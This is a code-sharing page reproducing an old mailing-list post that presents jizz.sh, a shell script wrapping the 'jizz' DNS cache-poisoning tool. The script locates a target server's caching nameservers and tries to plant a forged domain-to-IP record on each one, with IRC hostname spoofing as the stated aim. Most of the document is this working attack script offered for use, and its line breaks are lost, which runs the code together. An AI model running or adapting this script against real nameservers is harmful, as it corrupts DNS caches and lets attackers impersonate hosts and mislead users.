📄 jizz.sh
字号:
[ http://www.rootshell.com/ ]From: philbert <philbert@DATATRAX.NET>Subject: DNS "spoofing" simplified Alot of people ask about DNS spoofing and how common utilities like"jizz" work. Jizz and the like are not generally easy utilities to useeven if you do have an authorative nameserver. The idea is not simple andthe instructions with such utils arn't very self explanatory. On topof that, even if you understand it completelly with any of them you haveto either know what the target is using as a cacheing nameserver orotherwise make a calculated guess. I wrote a script interface tonight tothe commonly available jizz binary to make it a: alot simpler tounderstand and b: my script will automatically try to determine thedestinations nameserver and cache the domain on it, so that the only thingrequired to enter after the nameserver info is set up is the IP of theclient, domain name you want to spoof, and destination server (IRC serveror what not). The script does the rest for you. Please do not email me asking where to get jizz. If you don't haveit I'm not going to give it to you. Also the return email in the scriptdoes not have an MX *yet* so if you want to reach me I can be found onirc efnet as philbert.here is the script:--- begin jizz.sh ---#!/bin/sh## This script requires perl and the latest version of sh-utils for calculations,# as well as other various standard unix utilities.## This interface DOES NOT require you to know the cacheing nameserver of# the destination server, it will attempt to calculate it for you.#case "${3}" in "")echoecho "Intelligent DNS spoofer interface, by philbert."echo "(philbert@DataTrax.Net)"echoecho "usage: $0 <your ip> <spoofed domain> <irc/misc server>"echo "or: $0 <your ip> <spoofed domain> -ns <NS to cache fake domain>"echoexit 1 ;;esac# ----------------------------------------------------------# Set the configurations for your nameserver here# The name of the nameserver this is running on:NS=ns3.datatrax.net# The IP address of the nameserver this is running on:IP=1.2.3.4# A domain that this nameserver is strictly authorative for:AUTH=spoof.datatrax.net# End of user configuration# ----------------------------------------------------------RAND=$RANDOMexport RANDjizz $RAND.$AUTH. $NS $IP $AUTH $1 $2. >/dev/null &sleep 1if [ "$3" = "-ns" ]; thenecho "echo "trying to cache $2 on $4..."nslookup -type=soa $RAND.$AUTH. $4 >/dev/null 2>&1echo "$1 is cached on $2 as `nslookup $1 $2 | grep Name | cut -c10-`exit 1else false ; fiNS=`host $3. | perl -n -e 's/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/print $1/e'`if [ "NS" = "" ]; then NS=$3; else NS=$NS; fiecho "trying to cache $2 on the server itself..."nslookup -type=soa $RAND.$AUTH. $NS >/dev/null 2>&1TEST=`nslookup $1 $3 | grep Name | cut -c10-`if [ "$TEST" = "$2" ]; thenecho "Success!, $2 is cached on $3 as $1"else echo "Failed..."; fiRDEST=`nslookup $NS | grep Name | cut -c10-`if [ "$RDEST" = "" ]; then RDEST=$3; else RDEST=$RDEST; fiNS=`dnsquery $RDEST | grep "IN NS" | cut -f3- | cut -f2- -dS`if [ "$NS" = "" ]; thenNS=`echo $RDEST | cut -f2- -d.`NS=`dnsquery $NS | grep "IN NS" | cut -f3- | cut -f2- -dS`else NS=$NS; fiCRUNCH=1while true ; doTARGET=`echo $NS | cut -f$CRUNCH -d" "`if [ "$TARGET" = "" ]; thenkillall -9 jizz >/dev/null &exit 1; else TARGET=$TARGET; fiecho "trying to cache $2 on $TARGET..."nslookup -type=soa $RAND.$AUTH. $TARGET >/dev/null 2>&1TEST=`nslookup $1 $TARGET | grep Name | cut -c10-`if [ "$TEST" = "$2" ]; thenecho "Success!, $2 is cached on $TARGET as $1"else echo "Failed..."; fiCRUNCH=`expr $CRUNCH + 1`done--- end jizz.sh ---
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -